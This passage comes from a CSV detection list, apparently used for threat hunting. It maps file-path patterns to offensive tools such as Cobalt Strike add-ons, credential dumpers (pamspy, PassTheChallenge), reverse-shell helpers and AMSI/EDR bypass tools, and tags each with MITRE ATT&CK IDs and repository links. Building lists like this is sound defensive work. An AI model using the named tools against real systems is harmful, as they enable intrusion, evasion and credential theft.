TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/output/payloads/*",".{0,1000}\/output\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is a 'bridge' between the sleep and python languages. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/output/ratchatPT*",".{0,1000}\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/ovs-agent-version.nse*",".{0,1000}\/ovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/OWASP*",".{0,1000}\/OWASP.{0,1000}","offensive_tool_keyword","OWASP","resources and cheat sheet for web attacks techniques","T1190 - T1191 - T1192 - T1210 - T1590 - T1558","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Web Attacks","https://github.com/OWASP","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/owa-valid-users.txt*",".{0,1000}\/owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/p_cve-2014-9322.tar.gz*",".{0,1000}\/p_cve\-2014\-9322\.tar\.gz.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/p292/Phant0m*",".{0,1000}\/p292\/Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 
- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*/p2p-conficker.nse*",".{0,1000}\/p2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/package/portscan/*.go",".{0,1000}\/package\/portscan\/.{0,1000}\.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/PackMyPayload.git*",".{0,1000}\/PackMyPayload\.git.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*/PackMyPayload/*",".{0,1000}\/PackMyPayload\/.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*/pacu.git*",".{0,1000}\/pacu\.git.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/padre/pkg/exploit*",".{0,1000}\/padre\/pkg\/exploit.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle 
attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*/paensy.cpp*",".{0,1000}\/paensy\.cpp.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device (HID attacks). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*/pamspy -p *",".{0,1000}\/pamspy\s\-p\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/pamspy.git*",".{0,1000}\/pamspy\.git.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/papacat.bat",".{0,1000}\/papacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/papacat.ps1*",".{0,1000}\/papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in 
post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/papacat.zip*",".{0,1000}\/papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*/paranoidninja/*",".{0,1000}\/paranoidninja\/.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/Parasite Invoke.exe*",".{0,1000}\/Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*/Parasite%20Invoke.exe",".{0,1000}\/Parasite\%20Invoke\.exe","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*/Parasite-Invoke.git*",".{0,1000}\/Parasite\-Invoke\.git.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*/parrot/iso/*.iso*",".{0,1000}\/parrot\/iso\/.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrot-mirror/*",".{0,1000}\/parrot\-mirror\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrot-on-docker/*",".{0,1000}\/parrot\-on\-docker\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrotsec/*",".{0,1000}\/parrotsec\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ParsedMalleableData.txt*",".{0,1000}\/ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*/parsers/nessus.py*",".{0,1000}\/parsers\/nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/pass_gen.pl*",".{0,1000}\/pass_gen\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/PassDetective.git*",".{0,1000}\/PassDetective\.git.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*/passhash.sl*",".{0,1000}\/passhash\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*/passive_sqli.txt*",".{0,1000}\/passive_sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/PassTheCert.git*",".{0,1000}\/PassTheCert\.git.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*/PassTheChallenge.git*",".{0,1000}\/PassTheChallenge\.git.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*/PassTheChallenge/Constants.h*",".{0,1000}\/PassTheChallenge\/Constants\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*/PassTheChallenge/Protocol_h.h*",".{0,1000}\/PassTheChallenge\/Protocol_h\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*/passwd.py*",".{0,1000}\/passwd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/passwd_tracer.c*",".{0,1000}\/passwd_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/password.lst*",".{0,1000}\/password\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/password/mimipenguin/*",".{0,1000}\/password\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/password_brute.txt*",".{0,1000}\/password_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/password_cracker.py*",".{0,1000}\/password_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/password_ruled.txt*",".{0,1000}\/password_ruled\.txt.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*/passwordcracker.Dockerfile*",".{0,1000}\/passwordcracker\.Dockerfile.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/passwordcracker/*",".{0,1000}\/passwordcracker\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Passwords.docx*",".{0,1000}\/Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation 
tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/patch_amsi.exe*",".{0,1000}\/patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/patch_etw.exe*",".{0,1000}\/patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/patchfinder64.*",".{0,1000}\/patchfinder64\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PatchingAPI.cpp*",".{0,1000}\/PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/PatchingAPI.exe*",".{0,1000}\/PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/path_traversal.txt*",".{0,1000}\/path_traversal\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/path_traversal_dict.txt*",".{0,1000}\/path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*/path_traversal_win32.txt*",".{0,1000}\/path_traversal_win32\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/path-mtu.nse*",".{0,1000}\/path\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
